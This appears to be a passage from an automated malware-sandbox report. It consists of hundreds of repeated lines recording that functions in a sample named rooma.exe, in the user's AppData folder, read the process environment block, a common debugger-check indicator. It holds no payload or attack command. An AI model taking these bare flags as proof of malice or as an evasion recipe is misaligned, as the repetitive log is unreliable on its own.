Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158F172 mov eax, dword ptr fs:[00000030h] 7_2_0158F172
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665152 mov eax, dword ptr fs:[00000030h] 7_2_01665152
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591131 mov eax, dword ptr fs:[00000030h] 7_2_01591131
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01591131 mov eax, dword ptr fs:[00000030h] 7_2_01591131
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h] 7_2_0158B136
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h] 7_2_0158B136
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h] 7_2_0158B136
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158B136 mov eax, dword ptr fs:[00000030h] 7_2_0158B136
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01650115 mov eax, dword ptr fs:[00000030h] 7_2_01650115
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C0124 mov eax, dword ptr fs:[00000030h] 7_2_015C0124
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 mov ecx, dword ptr fs:[00000030h] 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h] 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h] 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163A118 mov eax, dword ptr fs:[00000030h] 7_2_0163A118
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016661E5 mov eax, dword ptr fs:[00000030h] 7_2_016661E5
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD1D0 mov eax, dword ptr fs:[00000030h] 7_2_015CD1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CD1D0 mov ecx, dword ptr fs:[00000030h] 7_2_015CD1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C01F8 mov eax, dword ptr fs:[00000030h] 7_2_015C01F8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016561C3 mov eax, dword ptr fs:[00000030h] 7_2_016561C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016561C3 mov eax, dword ptr fs:[00000030h] 7_2_016561C3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016651CB mov eax, dword ptr fs:[00000030h] 7_2_016651CB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov ecx, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160E1D0 mov eax, dword ptr fs:[00000030h] 7_2_0160E1D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B51EF mov eax, dword ptr fs:[00000030h] 7_2_015B51EF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015951ED mov eax, dword ptr fs:[00000030h] 7_2_015951ED
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016411A4 mov eax, dword ptr fs:[00000030h] 7_2_016411A4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E7190 mov eax, dword ptr fs:[00000030h] 7_2_015E7190
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h] 7_2_0158A197
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h] 7_2_0158A197
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A197 mov eax, dword ptr fs:[00000030h] 7_2_0158A197
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D0185 mov eax, dword ptr fs:[00000030h] 7_2_015D0185
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AB1B0 mov eax, dword ptr fs:[00000030h] 7_2_015AB1B0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164C188 mov eax, dword ptr fs:[00000030h] 7_2_0164C188
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164C188 mov eax, dword ptr fs:[00000030h] 7_2_0164C188
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161019F mov eax, dword ptr fs:[00000030h] 7_2_0161019F
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665060 mov eax, dword ptr fs:[00000030h] 7_2_01665060
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01592050 mov eax, dword ptr fs:[00000030h] 7_2_01592050
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BB052 mov eax, dword ptr fs:[00000030h] 7_2_015BB052
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161106E mov eax, dword ptr fs:[00000030h] 7_2_0161106E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D070 mov ecx, dword ptr fs:[00000030h] 7_2_0160D070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BC073 mov eax, dword ptr fs:[00000030h] 7_2_015BC073
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov ecx, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A1070 mov eax, dword ptr fs:[00000030h] 7_2_015A1070
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163705E mov ebx, dword ptr fs:[00000030h] 7_2_0163705E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163705E mov eax, dword ptr fs:[00000030h] 7_2_0163705E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE016 mov eax, dword ptr fs:[00000030h] 7_2_015AE016
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165903E mov eax, dword ptr fs:[00000030h] 7_2_0165903E
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A020 mov eax, dword ptr fs:[00000030h] 7_2_0158A020
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C020 mov eax, dword ptr fs:[00000030h] 7_2_0158C020
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B90DB mov eax, dword ptr fs:[00000030h] 7_2_015B90DB
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov ecx, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A70C0 mov eax, dword ptr fs:[00000030h] 7_2_015A70C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D0C0 mov eax, dword ptr fs:[00000030h] 7_2_0160D0C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0160D0C0 mov eax, dword ptr fs:[00000030h] 7_2_0160D0C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C0F0 mov eax, dword ptr fs:[00000030h] 7_2_0158C0F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015D20F0 mov ecx, dword ptr fs:[00000030h] 7_2_015D20F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015980E9 mov eax, dword ptr fs:[00000030h] 7_2_015980E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158A0E3 mov ecx, dword ptr fs:[00000030h] 7_2_0158A0E3
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016120DE mov eax, dword ptr fs:[00000030h] 7_2_016120DE
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B50E4 mov eax, dword ptr fs:[00000030h] 7_2_015B50E4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B50E4 mov ecx, dword ptr fs:[00000030h] 7_2_015B50E4
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016650D9 mov eax, dword ptr fs:[00000030h] 7_2_016650D9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C909C mov eax, dword ptr fs:[00000030h] 7_2_015C909C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BD090 mov eax, dword ptr fs:[00000030h] 7_2_015BD090
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BD090 mov eax, dword ptr fs:[00000030h] 7_2_015BD090
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01595096 mov eax, dword ptr fs:[00000030h] 7_2_01595096
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159208A mov eax, dword ptr fs:[00000030h] 7_2_0159208A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D08D mov eax, dword ptr fs:[00000030h] 7_2_0158D08D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016560B8 mov eax, dword ptr fs:[00000030h] 7_2_016560B8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016560B8 mov ecx, dword ptr fs:[00000030h] 7_2_016560B8
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F367 mov eax, dword ptr fs:[00000030h] 7_2_0164F367
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589353 mov eax, dword ptr fs:[00000030h] 7_2_01589353
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01589353 mov eax, dword ptr fs:[00000030h] 7_2_01589353
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D34C mov eax, dword ptr fs:[00000030h] 7_2_0158D34C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158D34C mov eax, dword ptr fs:[00000030h] 7_2_0158D34C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0163437C mov eax, dword ptr fs:[00000030h] 7_2_0163437C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01665341 mov eax, dword ptr fs:[00000030h] 7_2_01665341
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01612349 mov eax, dword ptr fs:[00000030h] 7_2_01612349
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597370 mov eax, dword ptr fs:[00000030h] 7_2_01597370
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597370 mov eax, dword ptr fs:[00000030h] 7_2_01597370
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01597370 mov eax, dword ptr fs:[00000030h] 7_2_01597370
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165A352 mov eax, dword ptr fs:[00000030h] 7_2_0165A352
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov ecx, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161035C mov eax, dword ptr fs:[00000030h] 7_2_0161035C
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158C310 mov ecx, dword ptr fs:[00000030h] 7_2_0158C310
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165132D mov eax, dword ptr fs:[00000030h] 7_2_0165132D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0165132D mov eax, dword ptr fs:[00000030h] 7_2_0165132D
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015B0310 mov ecx, dword ptr fs:[00000030h] 7_2_015B0310
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h] 7_2_015CA30B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h] 7_2_015CA30B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015CA30B mov eax, dword ptr fs:[00000030h] 7_2_015CA30B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01587330 mov eax, dword ptr fs:[00000030h] 7_2_01587330
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161930B mov eax, dword ptr fs:[00000030h] 7_2_0161930B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161930B mov eax, dword ptr fs:[00000030h] 7_2_0161930B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0161930B mov eax, dword ptr fs:[00000030h] 7_2_0161930B
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015BF32A mov eax, dword ptr fs:[00000030h] 7_2_015BF32A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164F3E6 mov eax, dword ptr fs:[00000030h] 7_2_0164F3E6
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0159A3C0 mov eax, dword ptr fs:[00000030h] 7_2_0159A3C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015983C0 mov eax, dword ptr fs:[00000030h] 7_2_015983C0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_016653FC mov eax, dword ptr fs:[00000030h] 7_2_016653FC
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015C63FF mov eax, dword ptr fs:[00000030h] 7_2_015C63FF
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164C3CD mov eax, dword ptr fs:[00000030h] 7_2_0164C3CD
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h] 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h] 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015AE3F0 mov eax, dword ptr fs:[00000030h] 7_2_015AE3F0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015A03E9 mov eax, dword ptr fs:[00000030h] 7_2_015A03E9
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0164B3D0 mov ecx, dword ptr fs:[00000030h] 7_2_0164B3D0
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E739A mov eax, dword ptr fs:[00000030h] 7_2_015E739A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_015E739A mov eax, dword ptr fs:[00000030h] 7_2_015E739A
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01588397 mov eax, dword ptr fs:[00000030h] 7_2_01588397
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01588397 mov eax, dword ptr fs:[00000030h] 7_2_01588397
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_01588397 mov eax, dword ptr fs:[00000030h] 7_2_01588397
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h] 7_2_0158E388
Source: C:\Users\user\AppData\Roaming\rooma.exe Code function: 7_2_0158E388 mov eax, dword ptr fs:[00000030h] 7_2_0158E388
